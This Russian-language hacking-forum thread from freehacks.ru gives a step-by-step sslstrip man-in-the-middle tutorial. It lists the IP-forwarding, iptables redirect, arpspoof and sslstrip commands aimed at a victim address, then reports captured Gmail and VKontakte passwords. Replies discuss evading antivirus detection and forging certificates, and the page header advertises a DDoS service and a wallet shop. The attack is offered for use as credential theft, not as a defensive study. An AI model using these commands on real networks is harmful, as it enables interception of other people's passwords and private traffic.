Основан 26 Июля 2013 года
freehacks.ru fhacksnplmzxaaoo.onion
ДДОС СЕРВИС
Магазин Qiwi,Yandex Кошельков
Показано с 1 по 5 из 5
  1. #1
    TopicStarter
    Аватар для 404notfound

    Статус
    Offline
    Регистрация
    11.10.2013
    Сообщений
    32
    Репутация
    25 + / -
    Script Kiddie

    sslstrip Проверка работоспособности

    Где скачать: [Только зарегистрированные могут видеть это. ]

    Исходники: [Только зарегистрированные могут видеть это. ]

    Sslstrip была придумана Мокси Марлинспайком (Moxie Marlinspike) — человеком, который не в первый раз изобрел нетривиальный путь обхода SSL-сертификатов. В основе программы лежит простая идея о том, чтобы, находясь в MITM, перенести HTTPS-соединение с пользователя на себя, обмениваясь с жертвой лишь открытым HTTP, а себе оставляя интересующие данные. То есть мы становимся посредниками между пользователем и защищенным сервером, заменяя на лету все ссылки страниц с https на http. Утилита умеет подменять даже favicon — маленькую иконку — логотип сайта на замочек, похожий на тот, который появляется в браузере при пользовании SSL.[1]

    Как начать работать с sslstrip:
    1. Включяем IP Forwarding
    echo '1' > /proc/sys/net/ipv4/ip_forward
    2. Добавляем правило для перенаправления пакетов:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8888
    3. Производим атаку Mitm
    arpspoof -i eth0 -t 192.168.19.160 -r 192.168.19.2
    4. Запускаем sslstrip
    sslstrip -l 8888 -w sslstriplogfile.log
    Флаги:
    -l <port>, --listen=<port> - прослушиваемый порт;
    -w <filename>, --write=<filename> - имя файла, куда записываться все будет;
    Информацию о других флагах, можно получить выполнив команду: sslstrip –h
    [Только зарегистрированные могут видеть это. ]

    Жертва: Windows 7
    Браузер: Internet Explorer 8
    Пробуем зайти на gmail.com
    Вполне удачно, пароль перехвачен(Обратите внимание, что используется протокол http):
    [Только зарегистрированные могут видеть это. ]
    [Только зарегистрированные могут видеть это. ]

    Вконтакте: Удачно
    [Только зарегистрированные могут видеть это. ]
    [Только зарегистрированные могут видеть это. ]

    Mail.ru: Все равно использует https.
    [Только зарегистрированные могут видеть это. ]

    Еще и предупреждение выдает:
    [Только зарегистрированные могут видеть это. ]

    Соответственно пароль нам узнать не удается.

    Попробуем другой браузер, например Chrome:
    Вконтакте:

    [Только зарегистрированные могут видеть это. ]
    [Только зарегистрированные могут видеть это. ]

    Gmail: не смотря на sslstrip используется https, т.е. перехватить пароль не удастся.

    [Только зарегистрированные могут видеть это. ]

    Mail.ru:

    [Только зарегистрированные могут видеть это. ]

    Список литературы:
    1. [Только зарегистрированные могут видеть это. ]

  2. 3 пользователя(ей) сказали cпасибо:
  3. #2
    Заблокирован по собственному желанию
    Аватар для DeNZeL

    Статус
    Offline
    Регистрация
    29.10.2014
    Сообщений
    454
    Репутация
    140 + / -
    Безопасность
    чет я очень сомневаюсь что она работает сейчас на браузерах кроме ie...

  4. #3
    TopicStarter
    Аватар для 404notfound

    Статус
    Offline
    Регистрация
    11.10.2013
    Сообщений
    32
    Репутация
    25 + / -
    Script Kiddie
    Цитата Сообщение от DeNZeL Посмотреть сообщение
    чет я очень сомневаюсь что она работает сейчас на браузерах кроме ie...
    Проверяли, все работает. Ну как бы это и была проверка на современных браузерах.)
    Последний раз редактировалось 404notfound; 09.01.2015 в 21:23.

  5. #4
    Заблокирован по собственному желанию
    Аватар для DeNZeL

    Статус
    Offline
    Регистрация
    29.10.2014
    Сообщений
    454
    Репутация
    140 + / -
    Безопасность
    Цитата Сообщение от 404notfound Посмотреть сообщение
    Проверяли, все работает. Ну как бы это и была проверка на современных браузерах.)
    Чет очень странно... Проверю еще раз, но последние пару раз ничего не работало на новых браузерах.
    У меня Nod FireWall палит arpspoof кста, отпишись, не ругается ли у тебя антивирь на Man in the middle атаку.
    Ты сертификат свой генерировал или готовый использовал?

  6. #5
    TopicStarter
    Аватар для 404notfound

    Статус
    Offline
    Регистрация
    11.10.2013
    Сообщений
    32
    Репутация
    25 + / -
    Script Kiddie
    Вполне возможно что антивирусы будут ругаться на подмену мак адреса. А вообще обезопаситься от Mitm можно прописав статический mac в arp таблицы "жертвы".

    По поводу сертификата, от "хакера" до "жертвы" используется протокол http, как вариант можно сгенерировать свой сертификат, и отправлять его жертве, но тут появляется вопрос, как будет проходить проверка этого сертификата, а в такие глубины я пока не вдавался.

    Мысли в слух:
    Хотя идея хорошая, "хакер" принимает от жертвы запрос на переадресацию с http на https, генерирует свой сертификат и передает его "жертве", а с сайтом общается по его сертификату, но для реализация этого нужно знать, как будет проходить проверка сертификата на стороне "жертвы".

    Собственно этот вопрос не изучал досконально и могу ошибаться.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.